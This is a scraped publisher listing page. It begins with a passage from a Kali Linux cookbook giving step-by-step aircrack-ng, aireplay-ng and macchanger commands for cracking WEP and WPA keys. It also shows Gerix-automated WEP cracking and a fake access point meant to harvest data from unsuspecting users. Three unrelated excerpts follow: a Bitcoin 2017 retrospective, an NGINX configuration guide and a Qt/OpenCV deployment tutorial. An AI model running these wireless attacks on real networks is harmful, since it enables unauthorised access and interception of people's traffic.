mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0 Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0 Your screen will begin to fill with traffic. Let this process run for a minute or two until we have information to run the crack. Finally, we run AirCrack to crack the WEP key. aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password. Wireless network WPA/WPA2 cracking WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack NG as it's commonly referred) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key. Getting ready In order to perform the tasks of this recipe, experience with the Kali Linux terminal windows is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WPA. Open a terminal window and bring up a list of wireless network interfaces. airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down. airmon-ng stop wlan0 ifconfig wlan0 down Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55. macchanger -–mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments. Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0 Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case,the file's name is wirelessattack.cap. Aircrack-ng –w ./wordlist.lst wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump . Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute forced the generated CAP file in order to get the wireless password. Automating wireless network cracking In this recipe we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. How to do it... Let's begin the process of performing an automated wireless network crack with Gerix by downloading it. Using wget, navigate to the following website to download Gerix. wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar Once the file has been downloaded, we now need to extract the data from the RAR file. unrar x gerix-wifi-cracker-master.rar Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools. mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker Let's navigate to the directory where Gerix is located. cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the WEP tab. Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. Click on the Aircrack-ng – Decrypt WEP Password button. That's it! How it works... In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitoring mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we then used Chop Chop to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forced the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP secured network. Accessing clients using a fake AP In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of creating a fake AP with Gerix. Let's navigate to the directory where Gerix is located: cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, press the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults on each of the other options. To start the fake access point,click on the Start Face Access Point button. That's it! How it works... In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. The reason fake access points are a great tool to use is that to your victim, they appear to be a legitimate access point, thus making it trusted by the user. Using Gerix, we were able to automate the creation of setting up a fake access point in a few short clicks.
Read more
  • 0
  • 0
  • 37317

article-image-decrypting-bitcoin-2017-journey
Ashwin Nair
28 Dec 2017
7 min read
Save for later

There and back again: Decrypting Bitcoin`s 2017 journey from $1000 to $20000

Ashwin Nair
28 Dec 2017
7 min read
Lately, Bitcoin has emerged as the most popular topic of discussion amongst colleagues, friends and family. The conversations more or less have a similar theme - filled with inane theories around what Bitcoin is and and the growing fear of missing out on Bitcoin mania. Well to be fair, who would want to miss out on an opportunity to grow their money by more than 1000%. That`s the return posted by Bitcoin since the start of the year. Bitcoin at the time of writing this article is at $15,000 with a marketcap over $250 billion. To put the hype in context, Bitcoin is now valued higher than 90% of companies in S&P 500 list. Supposedly, invented by an anonymous group or an individual under the alias Satoshi Nakamoto in 2009, Bitcoin has been seen as a digital currency that the internet might not need but one that it deserves. Satoshi`s vision was to create a robust electronic payment system that functions smoothly without a need for a trusted third party. This was achievable with the help of Blockchain, a digital ledger which records transactions in an indelible fashion and is distributed across multiple nodes. This ensured that no transaction is altered or deleted, thus completely eliminating the need for a trusted third party. For all the excitement around Bitcoin and the increase in interest level towards owning one, the thought of dissecting the roller coaster journey from sub $1000 level to $15,000 this year seemed pretty exciting. Started year with a bang / Global uncertainties leading to Bitcoin rally - Oct 2016 to Jan 2017 Global uncertainties played a big role in driving Bitcoin`s price and boy 2016 was full of it!  From Brexit to Trump winning the US elections and major economic commotion in terms of Devaluation of China`s Yuan and India`s Demonetization drive all leading to investors seeking shelter in Bitcoin. The first blip - Jan 2017 to March 2017 China as a country has had a major impact in determining Bitcoin`s fate. Early 2017, China contributed to over 80% of Bitcoin transactions indicating the amount of power Chinese traders and investors had in controlling Bitcoin`s price. However, People's Bank of China`s closer inspection of the exchanges revealed several irregularities in the transactions and business practices. Which eventually led to officials halting withdrawals using Bitcoin transactions and taking stringent steps towards cryptocurrency exchanges. Source - Bloomberg On the path tobecoming  mainstream and gaining support from Ethereum - Mar 2017 to June 2017 During this phase, we saw the rise of another cryptocurrency, Ethereum, a close digital cousin of Bitcoin. Similar to Bitcoin, Ethereum is also built on top of Blockchain technology allowing it to build a decentralized public network. However, Ethereum’s capabilities extend beyond being a cryptocurrency and help developers to build and deploy any kind of decentralized applications. Ethereum`s valuation in this period rose from $20 to $375 which was quite beneficial for Bitcoin. As every reference of Ethereum had Bitcoin mentioned as well, whether it was to explain what Ethereum is or how it can take the number 1 cryptocurrency spot in the future. This, coupled with the rise in Blockchain`s popularity, increased Bitcoin`s visibility within USA. The media started observing politicians, celebrities and other prominent personalities speaking on Bitcoin as well. Bitcoin also received a major boost from Chinese exchanges, wherein withdrawals of the cryptocurrency resumed after nearly a four-month freeze. All these factors led to Bitcoin crossing an all time high of $2500, up by more than 150% since the start of the year. The Curious case of Fork - June 2017 to September 2017 The month of July saw the Cryptocurrencies market cap witnessing a sharp decline, with questions being raised on the price volatility and whether Bitcoin`s rally for the year was over? We can of-course now confidently debunk that question. Though, there hasn’t been any proven rationale behind the decline, one of the reasons seems to be profit booking following months of steep rally in valuations witnessed by Bitcoin. Another major factor, which might have driven the price collapse may be an unresolved dispute among leading members of the bitcoin community over how to overcome the growing problem of Bitcoin being slow and expensive. With growing usage of Bitcoin, its performance in terms of transaction time has slowed down. Bitcoin`s network due to its limitation in terms of block size could only execute around 7 transactions per second compared to the VISA Network which could do over 1600 transactions. This also led to transaction fees being increased substantially to $5.00 per transaction and settlement time often taking hours and even days. This eventually put Bitcoin`s flaw in the spotlight when compared with services offered by competitors such as Paypal in terms of cost and transaction time. Source - Coinmarketcap The poor performance of Bitcoin led to investors opting for other cryptocurrencies. The above graph, shows how Bitcoin`s dominance fell substantially compared to other cryptocurrencies such as Ethereum and Litecoin during this time.   With the core-community still unable to come to a consensus on how to improve the performance and update the software, the prospect of a “fork” was raised.  Fork highlights change in underlying software protocol of Bitcoin to make previous rules valid or invalid. There are two types of blockchain forks - soft fork and hard fork. Around August, the community announced to go ahead with a hard fork in the form of Bitcoin Cash. This news was surprisingly taken in a positive manner leading to Bitcoin rebounding strongly and reaching new heights of around $4000 in price. Once bitten, Twice Shy (China) September 2017 to October 2017 Source - Zerohedge The month of September saw another setback for Bitcoin due to measures taken from People`s Bank of China. This time, PBoC banned initial coin offerings (ICO), thus prohibiting the practice of building and selling cryptocurrency to any investors or to finance any startup projects within China. Based on a  report by National Committee of Experts on Internet Financial Security Technology, Chinese Investors were involved in 2.6 Billion Yuan worth of ICOs in January-June, 2017 reflecting China`s exposure towards Bitcoin. My Precious (October 2017 to December 2017) Source - Manmanroe During the last quarter Bitcoin`s surge has shocked even hardcore Bitcoin fanatics.  Everything seems to be going right for Bitcoin at the moment.  While at the start of the year China was the major contributor towards the hike in Bitcoin`s valuation, now the momentum seemed to have shifted to a much sensible and responsible market in terms of Japan who have embraced Bitcoin in quite a positive manner. As you can see from the below graph, Japan now holds more than 50% of transaction compared to USA which is much lesser in size. Besides Japan, we are also seeing positive developments in country such as Russia and India, who are looking to legalize cryptocurrency usage. Moreover, the level of interests towards Bitcoin from institutional investors is at its peak. All these factors have resulted in Bitcoin to cross the 5 digit mark for the first time in Nov, 2017 and touching an all time high figure of close to $20,000 in December, 2017. Post the record high, Bitcoin has been witnessing a crash and rebound phenomenon in the last two weeks of December. From a record high of $20,000 to $11,000 and now at $15,000, Bitcoin is still a volatile digital currency if one is looking for a quick price appreciation. Despite the valuation dilemma and the price volatility, one thing is sure: the world is warming up to the idea of cryptocurrencies and even owning one. There are already several predictions being made on how Bitcoin`s astronomical growth is going to continue in 2018. However, Bitcoin needs to overcome several challenges before it can replace the traditional currency and and be widely accepting in banking practices. Besides, the rise of other cryptocurriencies such as Ethereum, LiteCoin or bitcoin cash who are looking to dethrone Bitcoin from the #1 spot, there are broader issues at hand which the Bitcoin community should prioritize such as how to curb the effect of Bitcoin`s mining activities on the environment and on having smoother reforms as well as building regulatory roadmap from countries before people actually start using instead of just looking it as a tool for making a quick buck.  
Read more
  • 0
  • 33
  • 37275

article-image-configuration-guide
Packt
08 Nov 2016
13 min read
Save for later

A Configuration Guide

Packt
08 Nov 2016
13 min read
In this article by Dimitri Aivaliotis, author Mastering NGINX - Second Edition, The NGINX configuration file follows a very logical format. Learning this format and how to use each section is one of the building blocks that will help you to create a configuration file by hand. Constructing a configuration involves specifying global parameters as well as directives for each individual section. These directives and how they fit into the overall configuration file is the main subject of this article. The goal is to understand how to create the right configuration file to meet your needs. (For more resources related to this topic, see here.) The basic configuration format The basic NGINX configuration file is set up in a number of sections. Each section is delineated as shown: <section> { <directive> <parameters>; } It is important to note that each directive line ends with a semicolon (;). This marks the end of line. The curly braces ({}) actually denote a new configuration context, but we will read these as sections for the most part. The NGINX global configuration parameters The global section is used to configure the parameters that affect the entire server and is an exception to the format shown in the preceding section. The global section may include configuration directives, such as user and worker_processes, as well as sections, such as events. There are no open and closing braces ({}) surrounding the global section. The most important configuration directives in the global context are shown in the following table. These configuration directives will be the ones that you will be dealing with for the most part. Global configuration directives Explanation user The user and group under which the worker processes run is configured using this parameter. If the group is omitted, a group name equal to that of the user is used. worker_processes This directive shows the number of worker processes that will be started. These processes will handle all the connections made by the clients. Choosing the right number depends on the server environment, the disk subsystem, and the network infrastructure. A good rule of thumb is to set this equal to the number of processor cores for CPU-bound loads and to multiply this number by 1.5 to 2 for the I/O bound loads. error_log This directive is where all the errors are written. If no other error_log is given in a separate context, this log file will be used for all errors, globally. A second parameter to this directive indicates the level at which (debug, info, notice, warn, error, crit, alert, and emerg) errors are written in the log. Note that the debug-level errors are only available if the --with-debug configuration switch is given at compilation time. pid This directive is the file where the process ID of the main process is written, overwriting the compiled-in default. use This directive indicates the connection processing method that should be used. This will overwrite the compiled-in default and must be contained in an events context, if used. It will not normally need to be overridden, except when the compiled-in default is found to produce errors over time. worker_connections This directive configures the maximum number of simultaneous connections that a worker process may have opened. This includes, but is not limited to, client connections and connections to upstream servers. This is especially important on reverse proxy servers—some additional tuning may be required at the operating system level in order to reach this number of simultaneous connections. Here is a small example using each of these directives: # we want nginx to run as user 'www' user www; # the load is CPU-bound and we have 12 cores worker_processes 12; # explicitly specifying the path to the mandatory error log error_log /var/log/nginx/error.log; # also explicitly specifying the path to the pid file pid /var/run/nginx.pid; # sets up a new configuration context for the 'events' module events { # we're on a Solaris-based system and have determined that nginx # will stop responding to new requests over time with the default # connection-processing mechanism, so we switch to the second-best use /dev/poll; # the product of this number and the number of worker_processes # indicates how many simultaneous connections per IP:port pair are # accepted worker_connections 2048; } This section will be placed at the top of the nginx.conf configuration file. Using the include files The include files can be used anywhere in your configuration file, to help it be more readable and to enable you to reuse parts of your configuration. To use them, make sure that the files themselves contain the syntactically correct NGINX configuration directives and blocks; then specify a path to those files: include /opt/local/etc/nginx/mime.types; A wildcard may appear in the path to match multiple files: include /opt/local/etc/nginx/vhost/*.conf; If the full path is not given, NGINX will search relative to its main configuration file. A configuration file can easily be tested by calling NGINX as follows: nginx -t -c <path-to-nginx.conf> This command will test the configuration, including all files separated out into the include files, for syntax errors. Sample configuration The following code is an example of an HTTP configuration section: http { include /opt/local/etc/nginx/mime.types; default_type application/octet-stream; sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; server_names_hash_max_size 1024; } This context block would go after any global configuration directives in the nginx.conf file. The virtual server section Any context beginning with the keyword server is considered as a virtual server section. It describes a logical separation of a set of resources that will be delivered under a different server_name directive. These virtual servers respond to the HTTP requests, and are contained within the http section. A virtual server is defined by a combination of the listen and server_name directives. The listen directive defines an IP address/port combination or path to a UNIX-domain socket: listen address[:port]; listen port; listen unix:path; The listen directive uniquely identifies a socket binding under NGINX. There are a number of optional parameters that listen can take: The listen parameters Explanation Comments default_server This parameter defines this address/port combination as being the default value for the requests bound here.   setfib This parameter sets the corresponding FIB for the listening socket. This parameter is only supported on FreeBSD and not for UNIX-domain sockets. backlog This parameter sets the backlog parameter in the listen() call. This parameter defaults to -1 on FreeBSD and 511 on all other platforms. rcvbuf This parameter sets the SO_RCVBUF parameter on the listening socket.   sndbuf This parameter sets the SO_SNDBUF parameter on the listening socket.   accept_filter This parameter sets the name of the accept filter to either dataready or httpready. This parameter is only supported on FreeBSD. deferred This parameter sets the TCP_DEFER_ACCEPT option to use a deferred accept() call. This parameter is only supported on Linux. bind This parameter makes a separate bind() call for this address/port pair. A separate bind() call will be made implicitly if any of the other socket-specific parameters are used. ipv6only This parameter sets the value of the IPV6_ONLY parameter. This parameter can only be set on a fresh start and not for UNIX-domain sockets. ssl This parameter indicates that only the HTTPS connections will be made on this port. This parameter allows for a more compact configuration. so_keepalive This parameter configures the TCP keepalive connection for the listening socket.   The server_name directive is fairly straightforward and it can be used to solve a number of configuration problems. Its default value is "", which means that a server section without a server_name directive will match a request that has no Host header field set. This can be used, for example, to drop requests that lack this header: server { listen 80; return 444; } The nonstandard HTTP code, 444, used in this example will cause NGINX to immediately close the connection. Besides a normal string, NGINX will accept a wildcard as a parameter to the server_name directive: The wildcard can replace the subdomain part: *.example.com The wildcard can replace the top-level domain part: www.example.* A special form will match the subdomain or the domain itself: .example.com (matches *.example.com as well as example.com) A regular expression can also be used as a parameter to server_name by prepending the name with a tilde (~): server_name ~^www.example.com$; server_name ~^www(d+).example.(com)$; The latter form is an example using captures, which can later be referenced (as $1, $2, and so on) in further configuration directives. NGINX uses the following logic when determining which virtual server should serve a specific request: Match the IP address and port to the listen directive. Match the Host header field against the server_name directive as a string. Match the Host header field against the server_name directive with a wildcard at the beginning of the string. Match the Host header field against the server_name directive with a wildcard at the end of the string. Match the Host header field against the server_name directive as a regular expression. If all the Host headers match fail, direct to the listen directive marked as default_server. If all the Host headers match fail and there is no default_server, direct to the first server with a listen directive that satisfies step 1. This logic is expressed in the following flowchart: The default_server parameter can be used to handle requests that would otherwise go unhandled. It is therefore recommended to always set default_server explicitly so that these unhandled requests will be handled in a defined manner. Besides this usage, default_server may also be helpful in configuring a number of virtual servers with the same listen directive. Any directives set here will be the same for all matching server blocks. Locations – where, when, and how The location directive may be used within a virtual server section and indicates a URI that comes either from the client or from an internal redirect. Locations may be nested with a few exceptions. They are used for processing requests with as specific configuration as possible. A location is defined as follows: location [modifier] uri {...} Or it can be defined for a named location: location @name {…} A named location is only reachable from an internal redirect. It preserves the URI as it was before entering the location block. It may only be defined at the server context level. The modifiers affect the processing of a location in the following way: Location modifiers Handling = This modifier uses exact match and terminate search. ~ This modifier uses case-sensitive regular expression matching. ~* This modifier uses case-insensitive regular expression matching. ^~ This modifier stops processing before regular expressions are checked for a match of this location's string, if it's the most specific match. Note that this is not a regular expression match—its purpose is to preempt regular expression matching. When a request comes in, the URI is checked against the most specific location as follows: Locations without a regular expression are searched for the most-specific match, independent of the order in which they are defined. Regular expressions are matched in the order in which they are found in the configuration file. The regular expression search is terminated on the first match. The most-specific location match is then used for request processing. The comparison match described here is against decoded URIs; for example, a %20 instance in a URI will match against a "" (space) specified in a location. A named location may only be used by internally redirected requests. The following directives are found only within a location: Location-only directives Explanation alias This directive defines another name for the location, as found on the filesystem. If the location is specified with a regular expression, alias should reference captures defined in that regular expression. The alias directive replaces the part of the URI matched by the location such that the rest of the URI not matched will be searched for in that filesystem location. Using the alias directive is fragile when moving bits of the configuration around, so using the root directive is preferred, unless the URI needs to be modified in order to find the file. internal This directive specifies a location that can only be used for internal requests (redirects defined in other directives, rewrite requests, error pages, and so on.) limit_except This directive limits a location to the specified HTTP verb(s) (GET also includes HEAD). Additionally, a number of directives found in the http section may also be specified in a location. Refer to Appendix A, Directive Reference, for a complete list. The try_files directive deserves special mention here. It may also be used in a server context, but will most often be found in a location. The try_files directive will do just that—try files in the order given as parameters; the first match wins. It is often used to match potential files from a variable and then pass processing to a named location, as shown in the following example: location / { try_files $uri $uri/ @mongrel; } location @mongrel { proxy_pass http://appserver; } Here, an implicit directory index is tried if the given URI is not found as a file and then processing is passed on to appserver via a proxy. We will explore how best to use location, try_files, and proxy_pass to solve specific problems throughout the rest of the article. Locations may be nested except in the following situations: When the prefix is = When the location is a named location Best practice dictates that regular expression locations be nested inside the string-based locations. An example of this is as follows: # first, we enter through the root location / { # then we find a most-specific substring # note that this is not a regular expression location ^~ /css { # here is the regular expression that then gets matched location ~* /css/.*.css$ { } } } Summary In this article, we saw how the NGINX configuration file is built. Its modular nature is a reflection, in part, of the modularity of NGINX itself. A global configuration block is responsible for all aspects that affect the running of NGINX as a whole. There is a separate configuration section for each protocol that NGINX is responsible for handling. We may further define how each request is to be handled by specifying servers within those protocol configuration contexts (either http or mail) so that requests are routed to a specific IP address/port. Within the http context, locations are then used to match the URI of the request. These locations may be nested, or otherwise ordered to ensure that requests get routed to the right areas of the filesystem or application server. Resources for Article: Further resources on this subject: Zabbix Configuration [article] Configuring the essential networking services provided by pfSense [article] Configuring a MySQL linked server on SQL Server 2008 [article]
Read more
  • 0
  • 0
  • 37240

article-image-3-ways-to-deploy-a-qt-and-opencv-application
Gebin George
02 Apr 2018
16 min read
Save for later

3 ways to deploy a QT and OpenCV application

Gebin George
02 Apr 2018
16 min read
[box type="note" align="" class="" width=""]This article is an excerpt from the book, Computer Vision with OpenCV 3 and Qt5 written by Amin Ahmadi Tazehkandi.  This book covers how to build, test, and deploy Qt and OpenCV apps, either dynamically or statically.[/box] Today, we will learn three different methods to deploy a QT + OpenCV application. It is extremely important to provide the end users with an application package that contains everything it needs to be able to run on the target platform. And demand very little or no effort at all from the users in terms of taking care of the required dependencies. Achieving this kind of works-out-of-the-box condition for an application relies mostly on the type of the linking (dynamic or static) that is used to create an application, and also the specifications of the target operating system. Deploying using static linking Deploying an application statically means that your application will run on its own and it eliminates having to take care of almost all of the needed dependencies, since they are already inside the executable itself. It is enough to simply make sure you select the Release mode while building your application, as seen in the following screenshot: When your application is built in the Release mode, you can simply pick up the produced executable file and ship it to your users. If you try to deploy your application to Windows users, you might face an error similar to the following when your application is executed: The reason for this error is that on Windows, even when building your Qt application statically, you still need to make sure that Visual C++ Redistributables exist on the target system. This is required for C++ applications that are built by using Microsoft Visual C++, and the version of the required redistributables correspond to the Microsoft Visual Studio installed on your computer. In our case, the official title of the installer for these libraries is Visual C++ Redistributables for Visual Studio 2015, and it can be downloaded from the following link: https:/ / www. microsoft. com/en- us/ download/ details. aspx? id= 48145. It is a common practice to include the redistributables installer inside the installer for our application and perform a silent installation of them if they are not already installed. This process happens with most of the applications you use on your Windows PCs, most of the time, without you even noticing it. We already quite briefly talked about the advantages (fewer files to deploy) and disadvantages (bigger executable size) of static linking. But when it is meant in the context of deployment, there are some more complexities that need to be considered. So, here is another (more complete) list of disadvantages, when using static linking to deploy your applications: The building takes more time and the executable size gets bigger and bigger. You can't mix static and shared (dynamic) Qt libraries, which means you can't use the power of plugins and extending your application without building everything from scratch. Static linking, in a sense, means hiding the libraries used to build an application. Unfortunately, this option is not offered with all libraries, and failing to comply with it can lead to licensing issues with your application. This complexity arises partly because of the fact that Qt Framework uses some third-party libraries that do not offer the same set of licensing options as Qt itself. Talking about licensing issues is not a discussion suitable for this book, so we'll suffice with mentioning that you must be careful when you plan to create commercial applications using static linking of Qt libraries. For a detailed list of licenses used by third-party libraries within Qt, you can always refer to the Licenses Used in Qt web page from the following link: http://doc.qt.io/qt-5/ licenses-used-in-qt.html Static linking, even with all of its disadvantages that we just mentioned, is still an option, and a good one in some cases, provided that you can comply with the licensing options of the Qt Framework. For instance, in Linux operating systems where creating an installer for our application requires some extra work and care, static linking can help extremely reduce the effort needed to deploy applications (merely a copy and paste). So, the final decision of whether to use static linking or not is mostly on you and how you plan to deploy your application. Making this important decision will be much easier by the end of this chapter, when you have an overview of the possible linking and deployment methods. Deploying using dynamic linking When you deploy an application built with Qt and OpenCV using shared libraries (or dynamic linking), you need to make sure that the executable of your application is able to reach the runtime libraries of Qt and OpenCV, in order to load and use them. This reachability or visibility of runtime libraries can have different meanings depending on the operating system. For instance, on Windows, you need to copy the runtime libraries to the same folder where your application executable resides, or put them in a folder that is appended to the PATH environment value. Qt Framework offers command-line tools to simplify the deployment of Qt applications on Windows and macOS. As mentioned before, the first thing you need to do is to make sure your application is built in the Release mode, and not Debug mode. Then, if you are on Windows, first copy the executable (let us assume it is called app.exe) from the build folder into a separate folder (which we will refer to as deploy_path) and execute the following commands using a command-line instance: cd deploy_path QT_PATHbinwindeployqt app.exe The windeployqt tool is a deployment helper tool that simplifies the process of copying the required Qt runtime libraries into the same folder as the application executable. Itsimply takes an executable as a parameter and after determining the modules used to create it, copies all required runtime libraries and any additional required dependencies, such as Qt plugins, translations, and so on. This takes care of all the required Qt runtime libraries, but we still need to take care of OpenCV runtime libraries. If you followed all of the steps in Chapter 1, Introduction to OpenCV and Qt, for building OpenCV libraries dynamically, then you only need to manually copy the opencv_world330.dll and opencv_ffmpeg330.dll files from OpenCV installation folder (inside the x86vc14bin folder) into the same folder where your application executable resides. We didn't really go into the benefits of turning on the BUILD_opencv_world option when we built OpenCV in the early chapters of the book; however, it should be clear now that this simplifies the deployment and usage of the OpenCV libraries, by requiring only a single entry for LIBS in the *.pro file and manually copying only a single file (not counting the ffmpeg library) when deploying OpenCV applications. It should be also noted that this method has the disadvantage of copying all OpenCV codes (in a single library) along your application even when you do not need or use all of its modules in a project. Also note that on Windows, as mentioned in the Deploying using static linking section, you still need to similarly provide the end users of your application with Microsoft Visual C++ Redistributables. On a macOS operating system, it is also possible to easily deploy applications written using Qt Framework. For this reason, you can use the macdeployqt command-line tool provided by Qt. Similar to windeployqt, which accepts a Windows executable and fills the same folder with the required libraries, macdeployqt accepts a macOS application bundle and makes it deployable by copying all of the required Qt runtimes as private frameworks inside the bundle itself. Here is an example: cd deploy_path QT_PATH/bin/macdeployqt my_app_bundle Optionally, you can also provide an additional -dmg parameter, which leads to the creation of a macOS *.dmg (disk image) file. As for the deployment of OpenCV libraries when dynamic linking is used, you can create an installer using Qt Installer Framework (which we will learn about in the next section), a third-party provider, or a script that makes sure the required runtime libraries are copied to their required folders. This is because of the fact that simply copying your runtime libraries (whether it is OpenCV or anything else) to the same folder as the application executable does not help with making them visible to an application on macOS. The same also applies to the Linux operating system, where unfortunately even a tool for deploying Qt runtime libraries does not exist (at least for the moment), so we also need to take care of Qt libraries in addition to OpenCV libraries, either by using a trusted third-party provider (which you can search for online) or by using the cross-platform installer provided by Qt itself, combined with some scripting to make sure everything is in place when our application is executed. Deploy using Qt Installer Framework Qt Installer Framework allows you to create cross-platform installers of your Qt applications for Windows, macOS, and Linux operating systems. It allows for creating standard installer wizards where the user is taken through consecutive dialogs that provide all the necessary information, and finally display the progress for when the application is being installed and so on, similar to most of installations you have probably faced, and especially the installation of Qt Framework itself. Qt Installer Framework is based on Qt Framework itself but is provided as a different package and does not require Qt SDK (Qt Framework, Qt Creator, and so on) to be present on a computer. It is also possible to use Qt Installer Framework in order to create installer packages for any application, not just Qt applications. In this section, we are going to learn how to create a basic installer using Qt Installer Framework, which takes care of installing your application on a target computer and copying all the necessary dependencies. The result will be a single executable installer file that you can put on a web server to be downloaded or provide it in a USB stick or CD, or any other media type. This example project will help you get started with working your way around the many great capabilities of Qt Installer Framework by yourself. You can use the following link to download and install the Qt Installer Framework. Make sure to simply download the latest version when you use this link, or any other source for downloading it. At the moment, the latest version is 3.0.2: https://download.qt.io/official_releases/qt-installer-framework After you have downloaded and installed Qt Installer Framework, you can start creating the required files that Qt Installer Framework needs in order to create an installer. You can do this by simply browsing to the Qt Installer Framework, and from the examples folder copying the tutorial folder, which is also a template in case you want to quickly rename and re-edit all of the files and create your installer quickly. We will go the other way and create them manually; first because we want to understand the structure of the required files and folders for the Qt Installer Framework, and second, because it is still quite easy and simple. Here are the required steps for creating an installer: Assuming that you have already finished developing your Qt and OpenCV application, you can start by creating a new folder that will contain the installer files. Let's assume this folder is called deploy. Create an XML file inside the deploy folder and name it config.xml. This XML file must contain the following: <?xml version="1.0" encoding="UTF-8"?> <Installer> <Name>Your application</Name> 